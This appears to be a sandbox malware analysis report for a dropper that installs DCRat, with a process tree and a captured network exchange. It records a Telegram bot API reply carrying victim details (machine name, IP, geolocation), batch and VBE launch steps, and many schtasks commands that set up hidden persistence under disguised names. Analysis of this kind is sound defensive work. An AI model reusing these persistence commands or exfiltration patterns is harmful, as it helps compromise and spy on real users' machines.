                                                                                            2024-03-29 14:27:00 UTC | 4096 | OUT | Data Raw: 3e b6 ff 00 34 79 98 ca 52 8e 0b 11 46 ac 7e c5 ec fb ab 34 fd 7c fb 3f 33 9a a3 8a 5a 4e 2b ed ee 7e 60 14 51 45 00 6a f8 67 fe 46 7d 37 fe be 17 f9 d7 b5 92 00 24 90 00 e4 93 5e 29 e1 af f9 19 b4 df fa f8 4f e7 5d ce ba d3 f8 8f c4 ab e1 b8 a6 78 6c 60 88 4f 7e c8 70 5f 3f 75 3f 91 fc 7d ab e7 b3 4a 7e d3 12 93 76 4a 37 7e 67 e5 3d 9e 11 b4 ae dc ac bd 6c 8d 0b 9f 1c f8 6a d6 66 8a 4d 56 32 c3 af 96 8f 20 fc d4 11 53 2e a9 6b ae 41 14 da 35 cd bd d3 43 2e f6 43 21 42 01 56 5e 78 24 75 f4 ac eb bd 6f c2 9e 13 91 74 d3 14 51 3a 80 5a 38 61 dc 47 a1 63 eb f5 e6 aa ea 97 72 5b 5b 8d 43 c2 5a 45 ac 86 ea 06 96 4b f5 45 0a 15 79 2b 8e 0e e3 e9 fc f1 c7 17 d5 e3 24 b9 62 d5 f6 6e d6 fc bf 56 7a 9f 58 9c 5b e6 92 76 dd 2b df f3 fd 11 9f e3 5d 36 55 b6
                                                                                            Data Ascii: >4yRF~4|?3ZN+~`QEjgF}7$^)O]xl`O~p_?u?}J~vJ7~g=ljfMV2 S.kA5C.C!BV^x$uotQ:Z8aGcr[[CZEKEy+$bnVzX[v+]6U
                                                                                            2024-03-29 14:27:00 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                                            2024-03-29 14:27:01 UTC | 1643 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0
                                                                                            Date: Fri, 29 Mar 2024 14:27:01 GMT
                                                                                            Content-Type: application/json
                                                                                            Content-Length: 1254
                                                                                            Connection: close
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                            {"ok":true,"result":{"message_id":373,"from":{"id":7194985122,"is_bot":true,"first_name":"iueidsobot","username":"iueidsobot"},"chat":{"id":6770966847,"first_name":"Stm","username":"cunuid","type":"private"},"date":1711722421,"photo":[{"file_id":"AgACAgIAAxkDAAIBdWYGz7WIYLJ8M3mirhqVe33O9ht8AAJd2jEbd_c4SHz7qxptfzH9AQADAgADcwADNAQ","file_unique_id":"AQADXdoxG3f3OEh4","file_size":1172,"width":90,"height":72},{"file_id":"AgACAgIAAxkDAAIBdWYGz7WIYLJ8M3mirhqVe33O9ht8AAJd2jEbd_c4SHz7qxptfzH9AQADAgADbQADNAQ","file_unique_id":"AQADXdoxG3f3OEhy","file_size":15924,"width":320,"height":256},{"file_id":"AgACAgIAAxkDAAIBdWYGz7WIYLJ8M3mirhqVe33O9ht8AAJd2jEbd_c4SHz7qxptfzH9AQADAgADeAADNAQ","file_unique_id":"AQADXdoxG3f3OEh9","file_size":66524,"width":800,"height":640},{"file_id":"AgACAgIAAxkDAAIBdWYGz7WIYLJ8M3mirhqVe33O9ht8AAJd2jEbd_c4SHz7qxptfzH9AQADAgADeQADNAQ","file_unique_id":"AQADXdoxG3f3OEh-","file_size":97969,"width":1280,"height":1024}],"caption":"\u0418\u041a\u0421\u0412\u041e\u0420\u041c \u0421\u041a\u0410\u0427\u0410\u041b \u0418\u0414\u0418\u041e\u0422 !\nID: a01383625cb44be503d281ec40523be6dc0b80cf\nComment: xworm\nUsername: user\nPC Name: 642294\nIP: 102.165.48.43\nGEO: US","caption_entities":[{"offset":119,"length":13,"type":"url"}]}}



                                                                                            Target ID:0
                                                                                            Start time:15:26:48
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Users\user\Desktop\H9gMIu2HXi.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\H9gMIu2HXi.exe"
                                                                                            Imagebase:0xa20000
                                                                                            File size:1'811'992 bytes
                                                                                            MD5 hash:4FB1D8F8DFF638F2C9B382F9552B18E2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:15:26:49
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:15:26:49
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:15:26:49
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:work.exe -priverdD
                                                                                            Imagebase:0x310000
                                                                                            File size:1'481'861 bytes
                                                                                            MD5 hash:E0A16200BD098799073FCB05E9D31300
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000003.00000003.1620690565.0000000004F96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 14%, ReversingLabs
                                                                                            • Detection: 20%, Virustotal
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:15:26:49
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe"
                                                                                            Imagebase:0x720000
                                                                                            File size:1'154'243 bytes
                                                                                            MD5 hash:1C051E7154F24C6BEA5788CBE9DCB478
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000003.1624273489.0000000006FB2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000003.1624823463.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000003.1623801206.00000000066A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 65%, ReversingLabs
                                                                                            • Detection: 58%, Virustotal
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:15:26:50
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe"
                                                                                            Imagebase:0xb90000
                                                                                            File size:147'456 bytes
                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:15:26:53
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat" "
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:15:26:53
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:15:26:53
                                                                                            Start date:29/03/2024
Path:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe"
Imagebase:0xbc0000
File size:832'512 bytes
MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000000.1663208372.0000000000BC2000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
• Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 70%, ReversingLabs
Reputation:low
Has exited:true

Target ID:9
Start time:15:26:55
Start date:29/03/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:10
Start time:15:26:55
Start date:29/03/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:11
Start time:15:26:55
Start date:29/03/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:12
Start time:15:26:55
Start date:29/03/2024
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"
Imagebase:0x7ff623200000
File size:2'759'232 bytes
MD5 hash:F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:13
Start time:15:26:55
Start date:29/03/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:14
Start time:15:26:55
Start date:29/03/2024
Path:C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
Imagebase:0x5d0000
File size:832'512 bytes
MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 70%, ReversingLabs
Reputation:low
Has exited:true

Target ID:15
Start time:15:26:55
Start date:29/03/2024
Path:C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
Imagebase:0x380000
File size:832'512 bytes
MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:16
Start time:15:26:55
Start date:29/03/2024
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41D7.tmp" "c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP"
Imagebase:0x7ff7c4b80000
File size:52'744 bytes
MD5 hash:C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:17
Start time:15:26:56
Start date:29/03/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:18
Start time:15:26:56
Start date:29/03/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:15:26:56
Start date:29/03/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:15:26:56
Start date:29/03/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:15:26:56
Start date:29/03/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:15:26:56
Start date:29/03/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:15:26:56
Start date:29/03/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:15:26:56
Start date:29/03/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:15:26:56
Start date:29/03/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:15:26:56
Start date:29/03/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:15:26:56
Start date:29/03/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:15:26:56
Start date:29/03/2024
Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:29
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 12 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:30
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "SurrogatewebSession" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:31
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:32
                                                                                            Start time:15:26:57
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            Imagebase:0xa80000
                                                                                            File size:832'512 bytes
                                                                                            MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:33
                                                                                            Start time:15:26:57
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            Imagebase:0x890000
                                                                                            File size:832'512 bytes
                                                                                            MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:34
                                                                                            Start time:15:26:57
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Recovery\winlogon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Recovery\winlogon.exe
                                                                                            Imagebase:0x9f0000
                                                                                            File size:832'512 bytes
                                                                                            MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\winlogon.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 70%, ReversingLabs
                                                                                            Has exited:true

                                                                                            Target ID:35
                                                                                            Start time:15:26:57
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Recovery\winlogon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Recovery\winlogon.exe
                                                                                            Imagebase:0x550000
                                                                                            File size:832'512 bytes
                                                                                            MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:36
                                                                                            Start time:15:27:00
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat"
                                                                                            Imagebase:0x7ff6ccd10000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:37
                                                                                            Start time:15:27:00
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:38
                                                                                            Start time:15:27:00
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:chcp 65001
                                                                                            Imagebase:0x7ff7a57d0000
                                                                                            File size:14'848 bytes
                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:39
                                                                                            Start time:15:27:00
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\w32tm.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                            Imagebase:0x7ff7f4a60000
                                                                                            File size:108'032 bytes
                                                                                            MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:40
                                                                                            Start time:15:27:05
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
                                                                                            Imagebase:0x6b0000
                                                                                            File size:832'512 bytes
                                                                                            MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:42
                                                                                            Start time:15:27:09
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                                                                            Imagebase:0xd90000
                                                                                            File size:832'512 bytes
                                                                                            MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 70%, ReversingLabs
